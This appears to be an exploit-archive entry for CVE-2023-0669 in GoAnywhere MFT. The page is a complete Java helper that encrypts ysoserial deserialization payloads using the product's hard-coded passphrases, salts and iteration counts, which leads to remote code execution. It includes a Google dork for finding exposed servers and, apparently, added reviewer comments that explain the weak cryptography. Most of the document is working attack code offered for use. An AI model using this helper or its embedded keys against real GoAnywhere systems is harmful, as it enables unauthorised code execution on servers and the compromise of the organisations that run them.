Goanywhere Encryption Helper 7.1.1 Remote Code Execution

2023.04.10
Risk: High
Local: No
Remote: Yes
CWE: N/A

// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
// Google Dork: title:"GoAnywhere"
// Date: 3/26/2023
// Exploit Author: Youssef Muhammad
// Vendor Homepage: https://www.goanywhere.com/
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
// Version: > 7.1.1 for windows / > 7.0.3 for Linux
// NOTE(review): the '>' comparators above look inverted for an "affected versions"
// field; confirm the affected range against the vendor advisory for the CVE below.
// Tested on: Windows, Linux
// CVE : CVE-2023-0669
// This script is needed to encrypt the serialized payload generated by the ysoserial tool
// in order to achieve Remote Code Execution

import java.util.Base64;
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.file.Files;
import java.nio.file.Paths;

/**
 * Wraps arbitrary bytes in AES-CBC using key material that is fully hard-coded in this file.
 *
 * <p>Security-relevant reading of the listing: the passphrase, salt, iteration count and IV
 * are all compile-time constants, so anyone holding this file can produce a bundle that
 * decrypts cleanly. CBC also carries no integrity tag. A receiver that decrypts with the same
 * constants therefore learns nothing about who produced the ciphertext and has to treat the
 * plaintext as untrusted input. According to the header comment, the plaintext in question is
 * a serialized Java object, which is where the CVE's code-execution impact comes from.
 */
public class CVE_2023_0669_helper {
    /** JCE transformation used for every bundle. */
    static String ALGORITHM = "AES/CBC/PKCS5Padding";

    // Placeholder only: encrypt() overwrites this with the 256-bit derived key on every call.
    // It is mutable shared state, so concurrent calls with different versions would race.
    static byte[] KEY = new byte[30];

    // Fixed 16-byte IV (the first 16 characters of the transformation name). Identical
    // plaintext prefixes therefore always yield identical ciphertext prefixes per key.
    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);

    /**
     * Command-line entry point: reads the file named by the first argument, encrypts it for
     * the scheme version named by the second argument and prints the encoded bundle.
     *
     * @param args {@code <file_path> <version>}; any other argument count prints usage and
     *     exits with status 1
     * @throws Exception if the file cannot be read or the cipher cannot be set up
     */
    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
            System.exit(1);
        }

        byte[] input = Files.readAllBytes(Paths.get(args[0]));
        System.out.println(encrypt(input, args[1]));
    }

    /**
     * Encrypts {@code data} with the static key for the requested scheme version.
     *
     * @param data plaintext bytes to wrap
     * @param version {@code "2"} selects the version-2 key and appends a {@code $2} marker;
     *     every other value selects the version-1 key with no marker
     * @return URL-safe Base64 of the ciphertext, followed by {@code $2} for version 2
     * @throws Exception if key derivation or encryption fails
     */
    public static String encrypt(byte[] data, String version) throws Exception {
        Cipher aes = Cipher.getInstance(ALGORITHM);

        boolean isV2 = version.equals("2");
        if (isV2) {
            KEY = getInitializationValueV2();
        } else {
            KEY = getInitializationValue();
        }

        aes.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(IV));
        byte[] cipherText = aes.doFinal(data);

        StringBuilder bundle = new StringBuilder(Base64.getUrlEncoder().encodeToString(cipherText));
        if (isV2) {
            // The suffix is what distinguishes a version-2 bundle from a version-1 bundle.
            bundle.append("$2");
        }
        return bundle.toString();
    }

    /** Derives the version-1 key from its hard-coded passphrase, salt and iteration count. */
    private static byte[] getInitializationValue() throws Exception {
        // Version 1 Encryption
        byte[] salt = {-19, 45, -32, -73, 65, 123, -7, 85};
        return deriveKey("go@nywhereLicenseP@$$wrd", salt, 9535);
    }

    /** Derives the version-2 key from its hard-coded passphrase, salt and iteration count. */
    private static byte[] getInitializationValueV2() throws Exception {
        // Version 2 Encryption
        byte[] salt = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
        return deriveKey("pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R", salt, 3392);
    }

    /**
     * Runs PBKDF2-HMAC-SHA1 over the given constants and returns a 256-bit key.
     *
     * <p>Because every argument is a constant at both call sites, the output is a constant
     * too; the key-stretching adds no secrecy here.
     */
    private static byte[] deriveKey(String passphrase, byte[] salt, int iterations)
            throws Exception {
        SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        // The platform-charset encode followed by a UTF-8 decode is kept exactly as in the
        // original listing; for these ASCII passphrases it is expected to be a no-op.
        char[] passwordChars = new String(passphrase.getBytes(), "UTF-8").toCharArray();
        PBEKeySpec spec = new PBEKeySpec(passwordChars, salt, iterations, 256);
        return factory.generateSecret(spec).getEncoded();
    }
}

